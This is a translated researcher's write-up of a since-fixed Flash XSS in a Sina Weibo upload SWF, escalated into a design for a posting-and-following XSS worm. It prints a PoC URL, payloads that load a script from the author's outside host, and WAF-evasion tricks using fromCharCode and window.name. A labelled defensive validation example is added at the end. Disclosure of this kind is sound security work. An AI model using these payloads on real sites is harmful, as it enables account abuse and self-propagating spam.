From a Flash XSS on Sina Weibo to XSS Worm
I have been studying some flash files recently, hoping to find something interesting.
By chance I came across a swf, http://vgirl.weibo.com/swf/BlogUp.swf (since fixed), the flash used for image upload, with the kind of XSS that is by now well known.
Decompiled:
private function init(arg0:flash.events::Event = null)
{
    // debugfile: F:\flash\blogUp_Vgirl\src;;xblogUploadImage.as
    stage.scaleMode = StageScaleMode.NO_SCALE;
    this.bIsUploading = false;
    this.tList = new Array();
    removeEventListener(Event.ADDED_TO_STAGE, this.init);
    // transparent full-stage sprite that catches the click which opens the file dialog
    var loc0:* = new Sprite();
    loc0.graphics.lineStyle();
    loc0.graphics.beginFill(0, 0);
    loc0.graphics.drawRect(0, 0, 1000, 1000);
    loc0.buttonMode = true;
    loc0.addEventListener(MouseEvent.CLICK, this.onClicked);
    this.addChild(loc0);
    var loc2:* = 0;
    loc0.y = 0;
    loc0.x = loc2;
    // every one of these callback names is read straight from the URL query string
    this.jsonselectfiles = stage.loaderInfo.parameters["onselectfiles"] + "";
    this.jsonsinglecomplete = stage.loaderInfo.parameters["onsinglecomplete"] + "";
    this.jsonallcomplete = stage.loaderInfo.parameters["onallcomplete"] + "";
    this.jsonerror = stage.loaderInfo.parameters["onerror"] + "";
    this.onUploadStart = stage.loaderInfo.parameters["onUploadStart"] + "";
    var loc1:* = stage.loaderInfo.parameters["onflashready"] + "";
    ExternalInterface.addCallback("setup", this.setup);
    ExternalInterface.addCallback("cancel", this.closeUploader);
    ExternalInterface.addCallback("setMaxSize", this.setMaxSize);
    // the URL-controlled string is passed as the name of the JavaScript function to call
    ExternalInterface.call(loc1);
    return;
}
The statement ExternalInterface.call(loc1); is an obvious XSS: loc1 comes straight from the GET parameter stage.loaderInfo.parameters["onflashready"].
Let's try:
It pops. The parameters read before it are also XSS, but this one is the most obvious, so I won't go into the first few.
When the first argument of ExternalInterface.call is controllable, the PoC is best written like this: http://vgirl.weibo.com/swf/BlogUp.swf?onflashready=(function(){alert(1)}) , because that value and the arguments that follow it are joined into the code that gets executed:
(function(){alert(1)})(param1, param2, ...)
Since this call passes no arguments, what finally runs in JavaScript is (function(){alert(1)})(), and the function body can hold whatever payload you like.
Then, as I was about to submit it, I went to the Sina SRC and saw an announcement:
Clearing out XSS!
All XSS are downgraded because HttpOnly has been added to the cookies?
Meaning that if I submit it like this, I get at most two gold coins!!
Half a day of digging for two gold coins? No. So let's think about how to make this XSS actually count; otherwise it would be a real waste. A worm.
I had noticed that the vgirl.weibo.com homepage is a flash app for rating girls, which can share to Weibo.
Some of the girls in it are quite pretty; I like it. Let's analyze the flash:
Five APIs stand out. On analysis, the first fetches the list of girls, the second rates a girl, the third shares to Weibo, the fourth fetches a specific girl's details, and the fifth follows her.
Obviously the third and fifth are what I want (why not the first and fourth?). With these two APIs plus the XSS above, I can make a user post arbitrary Weibo content and follow me, which gives a Weibo worm.
Next, let's keep going and see how the API is called (capturing packets is actually easier than reading the flash code; I won't show the packet capture here):
private function atShe(arg0:*)
{
    // build the POST body: text, uid and img all come from the girl object
    var loc0:* = new URLVariables();
    loc0.text = arg0.content;
    loc0.uid = arg0.oid;
    loc0.img = arg0.picurl;
    var loc1:* = new URLRequest(this.atApi);
    loc1.method = URLRequestMethod.POST;
    loc1.data = loc0;
    var loc2:* = new URLLoader();
    loc2.load(loc1);
    return;
}
This is the function that posts to Weibo. It simply sends a POST request: text is the content to publish, img is the girl's picture, and uid is the girl's user ID.
text can be any text, img can be any image (it must be a Sina sinaimg.cn image, so just find an image upload endpoint and upload one), and uid can be left empty.
For example, a request like this posts a Weibo:
With this interface, we can build a worm.
First, write the payload. To send the requests I used love.js (https://github.com/quininer/hisoka/blob/master/doc/LoveJS.md and https://quininer.github.io/tests/love.js), a JavaScript helper library written by Rabbit Jun of the Parsec team.
Then upload it to my server:
http://mhz.pw/game/vgirl/poc.js
One thing has to be clear first: Sina's CSRF defense as a whole relies on the Referer header, so wherever a Weibo is posted from, the server checks that the Referer comes from a legitimate domain. This script would not work anywhere else, but because our XSS is in a flash served from Sina's vgirl domain, the Referer is entirely legitimate.
So the job now is to make this flash load my js file.
The first payload that comes to mind:
http://vgirl.weibo.com/swf/BlogUp.swf?onflashready=(function(){document.body.appendChild(document.createElement("script")).src="http://mhz.pw/game/vgirl/poc.js"})
However, you'll find that with this payload the Weibo never gets posted. I wanted to see whether a WAF was intercepting it.
Tested: the keyword being blocked is appendChild.
Easy, I thought. Swap the payload:
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,109,104,122,46,112,119,47,103,97,109,101,47,118,103,105,114,108,47,118,103,105,114,108,46,106,115,34))
No keyword left. But it turned out the URL was too long and the flash wouldn't load.
So how to shorten the URL while still avoiding the keyword? window.name, of course:
<iframe src="/Article/UploadPic/2015-5/2015527105623165.jpg" name="document.body.appendChild(document.createElement('script')).src='http://mhz.pw/game/vgirl/poc.js'" id="vg"></iframe>
Put the exploit in the iframe's name attribute; the actual payload is then just setTimeout(window.name,0). When window.name is evaluated, my exploit runs.
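As an added example (not code from the original post or from the SWF), the following JavaScript models the bridge call described in the PoC section above, the callback-name check the SWF was missing, and the keyword rule the WAF applied to the later payloads; the wrapper shape name(args) is taken from the post's own description and is an assumption about the real Flash Player bridge.

```javascript
// Added example, not code from the original post or from Sina: models how the
// "onflashready" value ends up inside the JavaScript the browser runs, the
// callback-name check the SWF should have applied before ExternalInterface.call,
// and why the WAF's keyword rule did not help. Wrapper shape is an assumption.

// The "name" is pasted verbatim in front of the argument list, so any value that
// is itself a callable JavaScript expression gets executed.
function buildBridgeCall(callbackName, args) {
  const argList = args.map((a) => JSON.stringify(a)).join(",");
  return callbackName + "(" + argList + ")";
}

// A legitimate callback name is a plain dotted identifier ("onFlashReady",
// "app.ui.ready"). Parentheses, quotes, operators or whitespace make it code.
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
function isSafeCallbackName(name) {
  return typeof name === "string" && name.length <= 128 && CALLBACK_NAME.test(name);
}

// Hardened bridge: refuse to build the call unless the name passes the
// whitelist. Returns null when the input is rejected.
function buildBridgeCallSafe(callbackName, args) {
  if (!isSafeCallbackName(callbackName)) return null;
  return buildBridgeCall(callbackName, args);
}

// The WAF rule described in the post only matched a literal keyword
// (returns true when the value is let through).
function wafKeywordRule(value) {
  return !/appendChild/.test(value);
}

// Constructed inputs mirroring the post: one real callback name and the shapes
// of the injected values. No argument is passed, exactly as in the SWF.
const SAMPLES = [
  "onFlashReady",
  "(function(){alert(1)})",
  "eval(String.fromCharCode(100,111))",
  "setTimeout(window.name,0)",
];

// For each sample: does the keyword rule let it through, and what would the
// hardened bridge produce? Both evasions pass the WAF but are rejected here.
function triage(samples) {
  return samples.map((s) => ({ value: s, passesWaf: wafKeywordRule(s), bridgeCall: buildBridgeCallSafe(s, []) }));
}
```

The point of the triage table is that a keyword blocklist at the WAF never closes the bug; only validating the callback name inside the SWF does.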
Tidy up the code and upload it to the server.
Visiting it posts a Weibo like this:
Change it to attractive text and a picture and most of my followers will click it, and anyone who visits the link posts the same Weibo in turn.
And so it spreads from one to ten, from ten to a hundred.
An XSS worm like this is very harmful. In the same way I could also send the follow request, so that as the worm spreads it keeps adding followers without limit.
For legal reasons I will not run a live test. I did previously test a Sina Weibo worm: http://wooyun.org/bugs/wooyun-2010-065761, where you can see it along with the vendor's reply.
Testing is risky. Be careful with worms......